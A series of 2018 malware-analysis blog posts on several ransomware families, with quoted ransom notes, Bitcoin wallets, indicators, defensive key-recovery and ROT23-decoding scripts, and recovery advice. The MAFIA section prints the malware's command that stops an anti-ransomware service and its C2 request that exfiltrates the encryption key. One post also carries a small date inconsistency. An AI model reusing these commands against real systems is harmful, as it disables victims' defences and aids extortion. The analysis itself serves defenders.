Sunday, August 12, 2018

MAFIA ransomware targeting users in Korea

A new ransomware family was discovered and sent to me by MalwareHunterTeam, which we'll call MAFIA due to the extension it uses to encrypt files. The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

Another interesting (and new to me) feature is the use of "Onion.Pet", a Tor proxy, as a means for C2 (network) communication. Read the analysis below for more details on this ransomware. (Not to be confused with MafiaWare, a Hidden Tear variant; the MAFIA ransomware described here is a distinct family.)


It's currently unknown how the MAFIA ransomware reaches a system, but it's likely delivered via spear-phishing, rather than a manual installation. The binary analysed here has the following properties:

First, MAFIA will attempt to stop a service named "AppCheck" by launching the following command (which will use an elevated CMD prompt):

sc stop AppCheck

Ransomware usually stops database processes so that it can also encrypt database files which may be in use by those processes. However, in this case, AppCheck is actually a service belonging to an anti-ransomware product from South Korea. Figure 1 shows a screenshot of its website.

Figure 1 - "100% Signatureless Anti-Ransomware"

As for the effectiveness of this software: unknown, but the author deemed it important enough to include, so either it has proven to work, or it is used by a lot of users and businesses.

The author of the MAFIA ransomware has also left a debug path, which mentions the name "Jinwoo" ("진우" in Korean), and may be an indicator of the developer's nationality.

MAFIA makes use of OpenSSL to encrypt files, which it does with AES-256 in CBC mode. As mentioned earlier, encrypted files receive the ".MAFIA" extension. For example, Penguins.jpg becomes Penguins.jpg.MAFIA.

Files with the following extensions (300 in total) will be encrypted:

.3dm, .3ds, .3fr, .3g2, .3gp, .3pr, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .ads, .agdl, .ait, .apj, .arw, .asf, .asm, .asp, .asx, .avi, .back, .backup, .backupdb, .bak, .bank, .bay, .bdb, .bgt, .bik, .bkp, .bkp, .blend, .bpw, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfp, .cgm, .cib, .class, .cls, .cmt, .cpi, .cpp, .cr2, .craw, .crt, .crw, .csh, .csl, .csv, .dac, .db-journal, .db3.dbf, .dc2, .dcr, .dcs, .ddd, .ddoc, .ddrw, .dds, .der, .des, .design, .dgc, .djvu, .dng, .doc, .docm, .docx, .dot, .dotm, .dotx, .drf, .drw, .dtd, .dwg, .dxb, .dxf, .dxg, .eml, .eps, .erbsql, .erf, .exf, .fdb, .ffd, .fff, .fhd, .fla, .flac, .flv, .fpx, .fxg, .gray, .grey, .gry, .hbk, .hpp, .ibank, .ibd, .ibz, .idx, .iif, .iiq, .incpas, .indd, .java, .jpe, .jpeg, .jpg, .kc2, .kdbx, .kdc, .key, .kpdx, .lua, .m4v, .max, .mdb, .mdc, .mdf, .mef, .mmw, .moneywell, .mos, .mov, .mp3, .mp4, .mpg, .mrw, .msg, .myd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .nwb, .nx2, .nx1, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pas, .pat, .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .plc, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .prf, .psafe3, .psd, .pspimage, .pst, .ptx, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .r3d, .raf, .rar, .rat, .raw, .rdb, .rtf, .rw2, .rw1, .rwz, .s3db, .sas7bdat, .say, .sd0, .sda, .sdf, .sldm, .sldx, sqlite, .sqlite3, .sqlitedb, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .stc, .std, .sti, .stw, .stx, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .tex, .tga, .thm, .tlg, .txt, .vob, .wallet, .wav, .wb2, .wmv, .wpd, .wps, .xll, .x3f, .xis, .xla, .xlam, .xlk, .xlm, .xlr, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .ycbcra, .yuv, .zip, .alz, .jar, .png, .bmp, .a00, .gif, .egg

Note: because the MAFIA ransomware uses OpenSSL for encryption, the process is slow, and the user may be able to interrupt it by killing the process (typically named winlogin.exe), or by shutting down the machine.

Figure 2 shows a side-by-side visual representation of the original (left) and encrypted image (right).

Figure 2 - Comparison (the blue represents ASCII strings)

MAFIA will also create a ransom note in HTML named "Information" in the same location as the original dropper. Ironically enough, the ransom note will also have the ".mafia" extension appended - the file will not be encrypted however.

Figure 3 shows the ransom note, in a browser.

Figure 3 - Ransom note

The text translates from Korean ("고유넘버") as "Unique number", and appears to contain two unique identifiers.

As mentioned earlier, MAFIA will use a Tor proxy for C2 communication; an example request is as follows:

GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36

It appears the ransomware tries to send out the encryption key and IV using an HTTP GET request, which could make it possible to decrypt files, provided the network traffic was captured at that point.
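As an added illustration (not code from the original post, nor from the decrypter mentioned below), the following Python pulls the key material out of a captured request line like the one above and builds the matching OpenSSL command. The per-byte format (one unpadded 0x value per byte, no separators), the 32-byte key and 16-byte IV implied by AES-256-CBC, and the absence of an OpenSSL "Salted__" header in encrypted files are assumptions.

```python
"""Recover the AES-256-CBC key and IV that MAFIA leaks in its C2 GET request.

Each byte is sent as its own 0x-prefixed hex value, concatenated without a
separator and without zero-padding ("0x9", not "0x09"), so a plain hex decoder
will not work. Added illustration; not the ransomware's or the decrypter's code.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Request line quoted in the write-up (seq value copied as-is).
SAMPLE_REQUEST_LINE = (
    "GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7"
    "&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f"
    "0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1"
)

# One or two hex digits per token; the lookahead forces the split at the next "0x",
# so "0x90x2f" is read as 0x9, 0x2f and "0x600x3d" as 0x60, 0x3d.
_TOKEN = re.compile(r"0x([0-9a-fA-F]{1,2}?)(?=0x|$)")


def decode_0x_bytes(value: str) -> bytes:
    """Turn '0x9e0x4b...' into bytes; reject input the tokenizer does not consume whole."""
    tokens = _TOKEN.findall(value)
    if "".join("0x" + t for t in tokens) != value:
        raise ValueError(f"not a well-formed 0x-byte string: {value!r}")
    return bytes(int(t, 16) for t in tokens)


def extract_key_material(request_line: str) -> dict:
    """Parse a MAFIA-style request line into key, IV and the victim's seq identifier."""
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("expected a GET request line")
    params = parse_qs(urlsplit(target).query)
    key = decode_0x_bytes(params["key"][0])
    iv = decode_0x_bytes(params["iv"][0])
    # AES-256 takes a 32-byte key; CBC needs a 16-byte (block-sized) IV.
    if len(key) != 32 or len(iv) != 16:
        raise ValueError(f"unexpected lengths: key={len(key)} iv={len(iv)}")
    return {"key": key.hex(), "iv": iv.hex(), "seq": params["seq"][0]}


def is_mafia_beacon(request_line: str) -> bool:
    """Proxy-log check: the script name plus well-formed iv/key/seq parameters is distinctive."""
    try:
        path = urlsplit(request_line.split(" ", 2)[1]).path
        extract_key_material(request_line)
    except (ValueError, KeyError, IndexError):
        return False
    return path.endswith("/mafiaEgnima.php")


def openssl_decrypt_command(material: dict, encrypted: str, output: str) -> str:
    """Command to try against a captured .MAFIA file with the recovered raw key and IV.

    Assumption: MAFIA writes raw AES-256-CBC output with no OpenSSL "Salted__"
    header; if a sample shows one, the options need adjusting."""
    return (f"openssl enc -d -aes-256-cbc -K {material['key']} -iv {material['iv']} "
            f"-in {encrypted} -out {output}")


if __name__ == "__main__":
    material = extract_key_material(SAMPLE_REQUEST_LINE)
    print(material)
    print(openssl_decrypt_command(material, "Penguins.jpg.MAFIA", "Penguins.jpg"))
```

The is_mafia_beacon check can be run over the request lines of a web proxy log to flag the beacon and, at the same time, retain the key material for recovery.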

There are several other binaries of MAFIA out there, such as:


Three of these (119228fb8f4333b1c10ff03543c6c0ea, 0776e348313c7680db86ed924cff10b8 and 6487edd9b1e7cf6be4a9b1ac57424548) have a different C2 server, specifically:

Neither of these servers appeared to be online at the time of writing.

Decryption is possible thanks to Michael Gillespie (@demonslay335).

Download the decrypter from:

In case of questions or feedback, be sure to leave a comment.


Wednesday, June 6, 2018

RedEye ransomware: there's more than meets the eye

A rather anonymous account reached out to me on Twitter asking to check out a "scary & really nasty" sample.

It turned out to be RedEye ransomware, a new strain or variant by the same creator as Annabelle ransomware, which I discovered in February earlier this year.


This ransomware is named "RedEye" by the author "iCoreX".


The first noticeable thing about this file is the huge filesize: 35.0 MB (36657152 bytes). This is due to several media files, specifically images and audio files, embedded in the binary.

It contains three ".wav" files:
  • child.wav
  • redeye.wav
  • suicide.wav
All three audio files play a "creepy" sound, intended to scare the user. 

Additionally, the binary is protected with ConfuserEx, compression, and a few other tricks. It also embeds another binary, which is responsible for replacing the MBR, which has the following properties:

  • MD5: 878a10cda09fec2cb823f2b7138b550e
  • SHA1: db44dae60c12853cdbe62ec9f7b3493a897e519a
  • SHA256: f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7
  • Compilation timestamp (Delphi): 1992-06-19 22:22:17
  • Compilation timestamp (Actual): 2018-06-04 14:23:36
  • VirusTotal report:

What actually happens when executing this ransomware? Just like Annabelle ransomware it will perform a set of actions to make removal quite difficult, for example; it will disable task manager and in this iteration, will also hide your drives.

Similar to before, a ransom message is then displayed as follows:

Figure 1 - RedEye Ransomware

The message reads:

All your personal files has been encrypted with an very strong key by RedEye!
(Rijndael-Algorithmus -  AES - 256 Bit)
The only way to get your files back is:
- Go to http://redeye85x9tbxiyki.onion/tbxIyki - Enter your Personal ID
and pay 0.1 Bitcoins to the adress below! After that you need to click on
 "Check Payment". Then you will get a special key to unlock your computer.
You got 4 days to pay, when the time is up,
then your PC will be fully destroyed!

The ransomware has several options which I won't be showing here, but in short, it can:

  • Show encrypted files
  • Decrypt files
  • Support
  • Destroy PC

The Destroy PC option shows a GIF as background where you have the option to select "Do it" and "Close". I won't display the image however.

RedEye claims to encrypt files securely with AES256. On my machine, it appears to overwrite or fill files with 0 bytes, rendering the files useless, and appending the ".RedEye" extension.

The machine will, when the time runs out or when the "Do it" option is selected, reboot and replace the MBR, again similar to Annabelle ransomware, with the following message:

Figure 2 - MBR lock screen

The message reads as follows:

RedEye Terminated your computer! 
The reason for that could be:
- The time has expired
- You clicked on the 'Destroy PC' button
There is no way to fix your PC! Have Fun to try it :)
My YouTube Channel: iCoreX <- subscribe :p
Add me on discord! iCoreX#3333 <- [rest of the line is garbled in the source; the surviving words mention an old Discord account having been terminated and the author being the creator of Annabelle and Jigsaw ransomware]

The author, iCoreX, claims to have created Jigsaw, Annabelle, and now the RedEye ransomware; whether the former is true or not, I'll leave open.

Details on the ransomware:

Extension: .RedEye
BTC Wallet: 1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj
Payment portal: (currently offline): http://redeye85x9tbxiyki[.]onion

Currently, it doesn't appear any payments have been made as of yet:


You may be able to restore the MBR, or your files, if you catch the ransomware in the act and shut down the machine at that point. Reboot in safe mode and copy over or back up your files.

If tools such as the registry editor are not working, run Rkill in safe mode first.

Then, restore the MBR, and reinstall Windows.

You may also try to restore the MBR first, and subsequently attempt to restore files using Shadow Volume Copies. For example, a tool such as Shadow Explorer can be of assistance, or read the tutorial here.

If that doesn't work either, you may try using a data recovery program such as PhotoRec or Recuva.


While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do not pay the ransomware.

As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill.

You can read more on the purpose of ransomware here.


Monday, May 7, 2018

PSCrypt ransomware: back in business

PSCrypt is ransomware first discovered last year, in 2017, targeting users and organisations alike in Ukraine, and the malware itself is based on GlobeImposter ("GI") ransomware.

I've written about PSCrypt in the past, when it was distributed via Crystal Finance Millenium's hacked website: Crystal Finance Millennium used to spread malware

In this quick blog post, we'll take a look at the latest iteration of PSCrypt.


A file named "xls.scr", which sports a fancy "energy" or "power" icon is responsible for loading PSCrypt on the machine, and was spread via a phishing campaign.

Figure 1 - Icon

The ransomware has the following properties:

As mentioned earlier, PSCrypt is based on GlobeImposter and as such, has very similar functionality.

The following folders are excluded from being encrypted:

Avast, Avira, COMODO, Chrome, Common Files, Dr.Web, ESET, Internet Explorer, Kaspersky Lab, McAfee, Microsoft, Microsoft Help, Microsoft Shared, Microsoft.NET, Movie Maker, Mozilla Firefox, NVIDIA Corporation, Opera, Outlook Express, ProgramData, Symantec, Symantec_Client_Security, Windows, Windows App Certification Kit, Windows Defender, Windows Kits, Windows Mail, Windows Media Player, Windows Multimedia Platform, Windows NT, Windows Phone Kits, Windows Phone Silverlight Kits, Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell, Wsus, YandexBrowser, ntldr, spytech software, sysconfig, system volume information

This iteration of PSCrypt will encrypt all files, including executables, except those files with the following extensions:


As usual, a temporary batch file will be used to clear Volume Shadow Copies as well as Event Logs:

Figure 2 - Batch file

What's new in this iteration of PSCrypt is not only the changes implemented by/via GlobeImposter ransomware, but also the ransom note itself, as noted in Figure 3 and 4 below:

Figure 3 - Ransomware note, part 1

Figure 4 - Ransomware note, part 2

The title of the ransom note is "Ваші файли тимчасово зашифрувати! Не хвилюйтесь!", which translates to "Your files are temporarily encrypted! Do not worry!".

The Ukrainian version is rather lengthy, and is as follows:

Для відновлення даних потрібно дешифратор.
Щоб отримати дешифратор, ви повинні, оплатити послуги розшифровки:
Оплата відбувається за коштами біткойн на кошелек № 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9
Вартість послуги складає 150$
Оплату можна провести в терміналі IBox. або виберіть один з обмінних сайтів на сторінці - (приклад обмін Приват24 на BTC) також можете скористатися послугами
Додаткова інформація:
Програма можемо дешифрувати один файл як доказ того, що у неї є декодер. Для цього необхідно надіслати зашифрований файл - вагою не більше 2 mb, и ваш уникальный идентификационный код, на пошту:
Более детальная инструкция по оплате:
Всі файли розшифровуються тільки після 100% оплати
Ви дійсно отримуєте дешифратор після оплати
Не намагайтеся видалити програму або запустити антивірусні інструменти це може ускладнити вам роботу
Спроби самодешіфрованія файлів приведуть до втрати ваших даних
Декодери інших користувачів не сумісні з вашими даними, оскільки унікальний ключ шифрування кожного користувача.
За запитом користувачів, надаємо контакти клієнтів, які вже користувалися послугами нашого сервісу.
Додаткові контакти: - (якщо відповіді не прийшло після 24-х годин) - (якщо відповіді не прийшло після 24-х годин) - (якщо відповіді не прийшло після 24-х годин)
З повагою
Unlock files LLC
33530 1st Way South Ste. 102
Federal Way, WA 98003
United States

Google Translation, so pretty loose - I've made some minor corrections however:

To restore data you need a decoder.
To receive a decoder, you must pay for decoding services:
Payment is made at the expense of bitcoin to wallet number 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9
Service cost is $ 150
Payment can be made at the terminal IBox. or select one of the exchange sites on the page - (example exchange of Privat24 to the BTC), you can also use the services of
Additional Information:
The program can decrypt one file as proof that it has a decoder. To do this, you need to send an encrypted file weighing no more than 2 mb and your unique identification code by mail:
More detailed payment instructions:
All files are decrypted only after 100% payment
You really get a decoder after payment
Do not try to uninstall a program or run antivirus tools, which can complicate your work
Attempts to self-decrypt files will result in the loss of your data
Other users' decoders are not compatible with your data, as the unique encryption key for each user.
At the request of users, we provide contact with customers who have already used the services of our service.
Additional contacts: - (if the answer did not arrive after 24 hours) - (if the answer did not arrive after 24 hours) - (if the answer did not arrive after 24 hours)

The English version is rather short and to the point:

For decoding, write to the - Basic - backup Additional contacts: - (if the answer did not arrive after 24 hours) - (if the answer did not arrive after 24 hours) - (if the response did not arrive after 24 hours) 

The cost for restoring service is, interestingly enough, expressed in US dollars this time ($150), as opposed to Ukrainian currency in a previous iteration.

However, the images which included IBox instructions (as payment method) have been removed, and while IBox is still suggested as a service, there's also a new website introduced to pay via Bitcoin using E-BTC. 

E-BTC is a Ukrainian service which is "the most reliable and simple service for buying and selling Bitcoins and also the best partner for entering and withdrawing funds to the WEX stock exchange."

It also promises full anonymity.

Back to the ransomware. Encrypted files will have the .docs extension appended, for example Jellyfish.jpg becomes

Ransom note: .docs document.html
BTC Wallet: 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9

Extension: .docs

Fortunately, it appears no payments have been made as of yet: 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9


The last iteration of PSCrypt was observed in 2017, but it appears it has now returned to try and coerce users and organisations to pay the ransomware.

As usual, follow the prevention tips here to stay safe, but the rules of thumb are, as always:

  • Do not pay, unless there is imminent danger to life
  • Create regular backups, and do not forget to test that they work

IOCs follow below.


Saturday, May 5, 2018

Vietnamese ransomware wants you to add credit to a mobile phone

In this quick blog post we'll have a look at BKRansomware, a Vietnamese ransomware that wants you to top up its phone.

Update: 2018-05-06, scroll down for the update, added to the conclusion.


This ransomware is named "BKRansomware" based on the file name and debug path. Properties:

BKRansomware will run via command line and displays the following screen:

Figure 1 - Ransom message

The ransomware message is very brief, and displays:

send 50k viettel to 0963210438 to restore your data

Viettel is a form of credit for mobile phones, used in Vietnam and neighboring countries. It is part of "Viettel Group" (Tập đoàn Công nghiệp Viễn thông Quân đội in Vietnamese), a mobile network operator in Vietnam. (Wiki link). 

As such, it appears the creators are in desperate need of more credit so they can make calls again :)

It only encrypts a small number of extensions:

Figure 2 - extensions to encrypt

The list is as follows:

.txt, .cpp, .docx, .bmp, .doc, .pdf, .jpg, .pptx, .png, .c, .py, .sql

Encrypted files will have the .hainhc extension appended. Fun note: files aren't actually encrypted, but encoded with ROT23. For example, if you have a text file which says "password", the new content or file will now have "mxpptloa" instead.
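An added example, not the malware's own code: a ROT23 decoder that reverses the encoding and restores the original file name. It works on bytes so it can be run over any of the listed file types; that the malware shifts only ASCII letters (which is all the post shows) is an assumption.

```python
"""ROT23 decoder for files encoded by BKRansomware ("password" -> "mxpptloa").
Added illustration; not the ransomware's code. Assumption: only ASCII letters
are rotated, every other byte is left untouched."""
from pathlib import Path

ENCODED_EXT = ".hainhc"   # extension appended by the ransomware


def _rot_byte(b: int, shift: int) -> int:
    """Rotate one byte within a-z or A-Z; leave digits, punctuation, binary data alone."""
    if 0x61 <= b <= 0x7A:                       # a-z
        return (b - 0x61 + shift) % 26 + 0x61
    if 0x41 <= b <= 0x5A:                       # A-Z
        return (b - 0x41 + shift) % 26 + 0x41
    return b


def rot(data: bytes, shift: int) -> bytes:
    return bytes(_rot_byte(b, shift) for b in data)


def rot23_encode(data: bytes) -> bytes:
    """What the ransomware does to file contents."""
    return rot(data, 23)


def rot23_decode(data: bytes) -> bytes:
    """ROT23 followed by ROT3 is a full 26-step rotation, i.e. the identity."""
    return rot(data, 26 - 23)


def recover_file(encoded: Path) -> Path:
    """Decode one .hainhc file next to itself, restoring e.g. notes.txt.hainhc -> notes.txt."""
    if encoded.suffix != ENCODED_EXT:
        raise ValueError(f"{encoded} does not carry the {ENCODED_EXT} extension")
    original = encoded.with_suffix("")          # strips the trailing .hainhc only
    if original.exists():
        raise FileExistsError(f"refusing to overwrite {original}")
    original.write_bytes(rot23_decode(encoded.read_bytes()))
    return original


if __name__ == "__main__":
    print(rot23_encode(b"password"))            # b'mxpptloa'
    print(rot23_decode(b"mxpptloa"))            # b'password'
```

To recover a whole directory, call recover_file on each path returned by Path(directory).rglob("*" + ENCODED_EXT).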

Noteworthy is the debug path: 

C:\Users\Gaara\Documents\Visual Studio 2013\Projects\BKRansomware-20180503T093651Z-001\BKRansomware\Release\BKRansomware.pdb

The extension mentioned above, "hainhc" may refer to the following handle or persona on Whitehat VN, a Vietnamese Network security community:


While BKRansomware is not exactly very sophisticated, it is able to encrypt (or rather encode) files, and is unique in the sense that it asks you to top up a mobile phone.

Update: it appears this is a ransomware supposedly used for testing purposes, for both coding and testing VirusTotal detections. However, there seems to be a lot of "testing" going on, including keyloggers. Draw your own conclusions.

Follow the prevention tips here to stay safe.


Saturday, April 28, 2018

Ransomnix ransomware variant encrypts websites

Ransomnix is a (supposedly Jigsaw, but not really) ransomware variant that holds websites for ransom, and encrypts any files associated with the website.

This ransomware was discovered in the second half of 2018, and there's a brief write-up by Amigo-A here as well: Ransomnix ransomware

In this blog post, we'll discuss a newer variant.


Several encrypted websites were discovered, which display the following message:

Figure 1 - Ransom message, part 1

Figure 2 - Ransom message, part 2

The full message is as follows:

Now Pay 0.2 BTC
Payment will increase by
BTC each day after
Your Key Will Be Deleted
Your Bill till now 2.4000000000000004 BTC
Dear manager, on
Fri Apr 06 2018 02:08:34 GMT+0100 (GMT Summer Time)
your database server has been locked, your databases files are encrypted
and you have unfortunately "lost" all your data, Encryption was produced using
unique public key RSA-2048 generated for this server.
To decrypt files you need to obtain the private key.
All encrypted files ends with .Crypt
Your reference number: 4027
To obtain the program for this server, which will decrypt all files,
you need to pay 0.2 bitcoin on our bitcoin address 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o (today 1 bitcoin was around 15000 $).
After payment send us your number on our mail and we will send you decryption tool (you need only run it and all files will be decrypted during a few hours depending on your content size).
Before payment you can send us one small file (100..500 kilobytes) and we will decrypt it!
It's your guarantee that we have decryption tool. (use your reference number as a subject to your message)
We don't know who are you, All what we need is some money.
Don't panic if we don't answer you during 24 hours. It means that we didn't received your letter and write us again.
You can use one of that bitcoin exchangers for transfering bitcoin.
You dont need install bitcoin programs - you need only use one of this exchangers or other exchanger that you can find in for your country.
Please use english language in your letters. If you don't speak english then use to translate your letter on english language.
You do not have enough time to think each day payment will increase by
0.1 BTC and after one week your privite key will be deleted and your files will be locked for ever.

People use cryptocurrency for bad choices,
 but today you will have to use it to pay for your files!
 It's your choice!

The following JavaScript is responsible for keeping track of the price, and increasing it:

Figure 3 - JS function

The starting price is set at 0.2 BTC, but will increase by 0.1 BTC every day thanks to two functions: inprice and startTimer.
The function for calculating the time and date, startTimer, is a copy/paste from the following StackOverflow answer: The simplest possible JavaScript countdown timer?

Note that the start_date variable, 1522976914000, is the epoch timestamp in milliseconds, which converted is indeed Friday 6 April 2018 01:08:34, as mentioned in the ransom note.
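As an added illustration (not the attackers' JavaScript, which the figure does not reproduce), the following Python models the counter as the note describes it: start_date is the value above, and the assumption that the bill is computed as 0.2 + whole_days * 0.1 in IEEE-754 doubles reproduces the odd "2.4000000000000004 BTC" figure at 22 days.

```python
"""Model of the Ransomnix price counter; added illustration, not the page's own JS.
Assumptions: whole days elapsed since start_date, bill = 0.2 + days * 0.1 in doubles."""
from datetime import datetime, timezone
from decimal import Decimal

START_DATE_MS = 1522976914000                    # start_date from the ransom page
BASE_BTC, STEP_BTC, DEADLINE_DAYS = 0.2, 0.1, 7  # figures quoted in the note


def start_datetime_utc(start_ms: int = START_DATE_MS) -> datetime:
    """Epoch milliseconds -> aware UTC datetime (the note shows it in GMT+0100)."""
    return datetime.fromtimestamp(start_ms / 1000, tz=timezone.utc)


def days_elapsed(now_ms: int, start_ms: int = START_DATE_MS) -> int:
    """Whole days since the page was planted (never negative)."""
    return max(0, (now_ms - start_ms) // 86_400_000)


def bill_float(days: int) -> float:
    """As a JS page would compute it: binary doubles, hence 2.4000000000000004 at 22 days."""
    return BASE_BTC + days * STEP_BTC


def bill_decimal(days: int) -> Decimal:
    """The figure the attackers presumably meant to display, computed exactly."""
    return Decimal("0.2") + days * Decimal("0.1")


def status(now_ms: int) -> dict:
    """Bill and deadline state at a given time; the note threatens key deletion after one week."""
    days = days_elapsed(now_ms)
    return {"days": days, "bill_float": bill_float(days),
            "bill_exact": str(bill_decimal(days)), "key_deleted": days >= DEADLINE_DAYS}


if __name__ == "__main__":
    print(start_datetime_utc().isoformat())      # 2018-04-06T01:08:34+00:00
    print(bill_float(22), bill_decimal(22))       # 2.4000000000000004 2.4
```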

Ransomware message details:

BTC Wallet: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o
Extension: .Crypt

Files will be encrypted, as claimed by the cybercriminals, with RSA-2048.

Unfortunately, it appears several people have already paid for decryption: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o


If possible, restore the website from a backup, and subsequently patch your website; this means: install all relevant security patches for your CMS, and for plugins where applicable.

Then, change all your passwords. Better be safe than sorry.

It is currently unknown if decryption is possible. If you have an example of an encrypted file, please do upload it to ID Ransomware and NoMoreRansom, to see if decryption is possible, or if a decryptor can be developed.


For preventing ransomware that attacks your websites, you can follow my prevention tips here.

General ransomware prevention tips can be found here.


Ransomware can in theory be installed on everything; whether it's your machine, your website, or your IoT device. Follow the prevention tips above to stay safe.

Remember: create backups, regularly, and test them as well.